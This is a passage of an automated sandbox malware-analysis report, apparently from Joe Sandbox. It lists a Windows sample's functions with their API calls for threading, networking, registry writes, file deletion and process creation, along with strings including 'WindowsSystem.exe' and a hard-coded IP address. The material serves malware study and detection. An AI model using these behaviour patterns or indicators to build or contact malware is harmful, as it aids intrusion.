                                                                                                            • Opcode ID: a80d8d1b07f5633d444a1c9cf1061a5df5261bff402afe30083674596de7f884
                                                                                                            • Instruction ID: e07f746c30aa00ac67cf458c912a7fe66d72459a3449f088171e9b2bde1a7d71
                                                                                                            • Opcode Fuzzy Hash: a80d8d1b07f5633d444a1c9cf1061a5df5261bff402afe30083674596de7f884
                                                                                                            • Instruction Fuzzy Hash: DF71F974A0810AEFCB09CF98D495EEEB7B5FF4C304F248558E905AB350D734AA95CBA0
                                                                                                            Function 003169F9 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 111threadnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00316A7A
                                                                                                            • __snwprintf.LIBCMT ref: 00316A9F
                                                                                                              • Part of subcall function 0030A680: _memset.LIBCMT ref: 0030A6BF
                                                                                                              • Part of subcall function 0030A680: _memset.LIBCMT ref: 0030A70A
                                                                                                              • Part of subcall function 0030A680: CoInitializeEx.COMBASE(00000000,00000000), ref: 0030A754
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316AD9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316B24
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0030F100,00000000,00000000,00000000), ref: 00316B47
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316B64
                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 00316B73
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0031B630,00000000,00000000,00000000), ref: 00316B95
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321030,00000000,00000000,00000000), ref: 00316BAF
                                                                                                              • Part of subcall function 0031C3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
                                                                                                              • Part of subcall function 0031C3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
                                                                                                              • Part of subcall function 0031C3A0: FreeSid.ADVAPI32(?), ref: 0031C409
                                                                                                            • WSACleanup.WS2_32 ref: 00316BCA
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$FreeThread_memsetlstrlen$InitializeLocal__snwprintf$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken
                                                                                                            • String ID: "%s%s"$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 3184904793-474631092
                                                                                                            • Opcode ID: 071b508c7de7a8573f1bfed512d5030396798880104930553583074c80420588
                                                                                                            • Instruction ID: cc23589e620e35e9998131ad8129d9c9ea65ded7cb9cc8d0d7bd8563d5393fe8
                                                                                                            • Opcode Fuzzy Hash: 071b508c7de7a8573f1bfed512d5030396798880104930553583074c80420588
                                                                                                            • Instruction Fuzzy Hash: 79418070A90314ABEB3B9B94EC5BFE6336CAB19B05F108058F20DB91D1D6F469C4CB16
                                                                                                            Function 00313350 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 72memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313364
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313385
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 003133AC
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 003133BA
                                                                                                            • __snwprintf.LIBCMT ref: 003133E4
                                                                                                            • __snwprintf.LIBCMT ref: 003133FE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031340A
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00313414
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00313423
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031342D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00313437
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocTask__snwprintf$FolderKnownPathlstrlen
                                                                                                            • String ID: %s\System32$\\?\%s
                                                                                                            • API String ID: 2558432158-2868705786
                                                                                                            • Opcode ID: df55fa0bc6b4aed136ef82c66e247accce0bb5ff96baa228906345f80141f7c2
                                                                                                            • Instruction ID: 1bd0022383570b6d224a5be28f98b0be888db0ca50e63511448d12d139b21789
                                                                                                            • Opcode Fuzzy Hash: df55fa0bc6b4aed136ef82c66e247accce0bb5ff96baa228906345f80141f7c2
                                                                                                            • Instruction Fuzzy Hash: 352121B5E00218FFDB25DBE4DC89BADBB79EF48700F504558F605AB290DB745A80CB50
                                                                                                            Function 0031B9A0 Relevance: 21.1, APIs: 14, Instructions: 111memorynetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,-00000001,?,0031B8E1,00000000,00000000,0037D2C8,0037D370), ref: 0031B9AF
                                                                                                            • _memmove.LIBCMT ref: 0031B9CE
                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0031B8E1,00000000,00000000), ref: 0031B9F4
                                                                                                            • inet_addr.WS2_32(00000000), ref: 0031BA14
                                                                                                            • gethostbyname.WS2_32(00000000), ref: 0031BA27
                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0031B8E1,00000000), ref: 0031BA3A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc_memmovegethostbynameinet_addr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3088692038-0
                                                                                                            • Opcode ID: 457c82753af63889b0ffd6a0621c8c8bdee6711080392bcce5e172e7ba3c8be2
                                                                                                            • Instruction ID: 0f6479d4b3791d84f990fed094423562baf58eb157cad076a91048c2d696774f
                                                                                                            • Opcode Fuzzy Hash: 457c82753af63889b0ffd6a0621c8c8bdee6711080392bcce5e172e7ba3c8be2
                                                                                                            • Instruction Fuzzy Hash: 0F41ECB9E00208EFCB09DFA4D985BAEB7B9FF4C304F104558F506A7250D775AA40DB50
                                                                                                            Function 00312E00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 82memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00315BB2,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E13
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E28
                                                                                                            • __snwprintf.LIBCMT ref: 00312E61
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00312E6D
                                                                                                            • _memset.LIBCMT ref: 00312E97
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00312EC0
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00312ED7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312EFD
                                                                                                            • CoTaskMemFree.COMBASE(00315BB2), ref: 00312F07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask__snwprintf_memsetlstrlen
                                                                                                            • String ID: %s\%s${DCC27317-D180-4C2F-8EAC-B87FB882F1DC}
                                                                                                            • API String ID: 561441633-2871714980
                                                                                                            • Opcode ID: 278df3dd68a016bf3c9dde9206a79711b5b25699f4b974bd9030c83a68015a1e
                                                                                                            • Instruction ID: 615e395f377743649437caa6f8af7b050eb9b5a144becfd61e794d603c52ee8c
                                                                                                            • Opcode Fuzzy Hash: 278df3dd68a016bf3c9dde9206a79711b5b25699f4b974bd9030c83a68015a1e
                                                                                                            • Instruction Fuzzy Hash: 51318074E00208EBDB29DFA4DC49BEEBB79FF48700F108569F505A7290E7749A90CB64
                                                                                                            Function 00316BE0 Relevance: 21.1, APIs: 14, Instructions: 80synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316BFC
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C14
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C2A
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C3F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C57
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C6D
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C82
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C98
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CB0
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316CC5
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316CDB
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CF3
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D08
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: b9dc2c592dc7012556393e681efd6f6de4ae7aa498f0cbe12d0662d3fe42c945
                                                                                                            • Instruction ID: 3c44a056f553aa3c4dd0562e28ff5e287ee7d6aa40ba12b17087478bed8762d2
                                                                                                            • Opcode Fuzzy Hash: b9dc2c592dc7012556393e681efd6f6de4ae7aa498f0cbe12d0662d3fe42c945
                                                                                                            • Instruction Fuzzy Hash: 8D319175110201DBD33F9BA8ED8DB9637BEB748316F519618E12A562F0CB78A8C9CF40
                                                                                                            Function 0030B5A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 0030B5C0
                                                                                                            • _memset.LIBCMT ref: 0030B5DF
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • __snwprintf.LIBCMT ref: 0030B626
                                                                                                            • __snwprintf.LIBCMT ref: 0030B64B
                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0030B65A
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 0030B66C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030B67E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030B692
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0030B69F
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0030B6B5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFreeLocal__snwprintflstrlen$Attributes_memset$AllocDeleteDirectoryFolderKnownPathRemoveTask
                                                                                                            • String ID: %s%s$WindowsSystem.exe
                                                                                                            • API String ID: 4117469550-4151400913
                                                                                                            • Opcode ID: f23083e523e0de197ecf82b5c846d908ed2490bf7f628f9db3abcccb4728a781
                                                                                                            • Instruction ID: 03a850d9a55a8ecd99b88abcc94f17546548cf77d2431540b1bad95ab2d2f9df
                                                                                                            • Opcode Fuzzy Hash: f23083e523e0de197ecf82b5c846d908ed2490bf7f628f9db3abcccb4728a781
                                                                                                            • Instruction Fuzzy Hash: C2219371A5021C9BC771D764DC8DBE9B339AF54300F500A98F619961D1EB759EC48BA0
                                                                                                            Function 00309FC0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 74registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00309FF4
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030A00A
                                                                                                              • Part of subcall function 0031C570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
                                                                                                              • Part of subcall function 0031C570: GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
                                                                                                              • Part of subcall function 0031C570: LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
                                                                                                              • Part of subcall function 0031C570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
                                                                                                              • Part of subcall function 0031C570: CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
                                                                                                            • __snwprintf.LIBCMT ref: 0030A057
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0030A072
                                                                                                            • RegSetValueExW.ADVAPI32(?,{2DD5D29F-1CE3-49E7-8572-9D856412ED59},00000000,00000003,00000000,00000000), ref: 0030A09A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030A0AB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A0B8
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030A0CC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A0D9
                                                                                                            Strings
                                                                                                            • {2DD5D29F-1CE3-49E7-8572-9D856412ED59}, xrefs: 0030A08E
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030A041
                                                                                                            • SOFTWARE\%s, xrefs: 0030A046
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${2DD5D29F-1CE3-49E7-8572-9D856412ED59}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3609211549-3847718966
                                                                                                            • Opcode ID: f02179264a33ae954d62661767ab1726722859dceddd87e85a81a81736374586
                                                                                                            • Instruction ID: 1795b69e0f3b61aaebe714595d761a3109c468b4ce2e6e416809d65ca6dbb649
                                                                                                            • Opcode Fuzzy Hash: f02179264a33ae954d62661767ab1726722859dceddd87e85a81a81736374586
                                                                                                            • Instruction Fuzzy Hash: 172191B5A40318ABD731DB60DC4DBEA7778AF44700F1086C8A61DA6181EB759EC4CFA1
                                                                                                            Function 00321EA0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109stringsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(0037D4C0,185.157.162.216), ref: 00321EF4
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00321F36
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321F47
                                                                                                            • lstrcpyA.KERNEL32(?,0037D2C8), ref: 00321F94
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 00321FA9
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 00321F5B
                                                                                                              • Part of subcall function 00322030: lstrlenW.KERNEL32(?), ref: 00322049
                                                                                                              • Part of subcall function 00322030: setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 003220F0
                                                                                                            • lstrcpyA.KERNEL32(0037D4C0,?), ref: 00321FEF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlensetsockopt
                                                                                                            • String ID: 185.157.162.216$456
                                                                                                            • API String ID: 864648930-2825569901
                                                                                                            • Opcode ID: 7cfab7fa39dc7819e862e6251cedd44476b5fff2a9616584687df5d898745e68
                                                                                                            • Instruction ID: 09f1d7a50d31651a7475802a2d02e1b9bfca19ef8b52222196ab98b9d0e9f5a4
                                                                                                            • Opcode Fuzzy Hash: 7cfab7fa39dc7819e862e6251cedd44476b5fff2a9616584687df5d898745e68
                                                                                                            • Instruction Fuzzy Hash: 5A416270A40214FFD73BDBA4ED89FAA77B8BF08701F108209E519A72A0D775A984CB51
                                                                                                            Function 0030A550 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 86memoryprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030A560
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030A57C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030A591
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • __snwprintf.LIBCMT ref: 0030A5DD
                                                                                                            • _memset.LIBCMT ref: 0030A5F0
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030A637
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A646
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A650
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A661
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A66B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
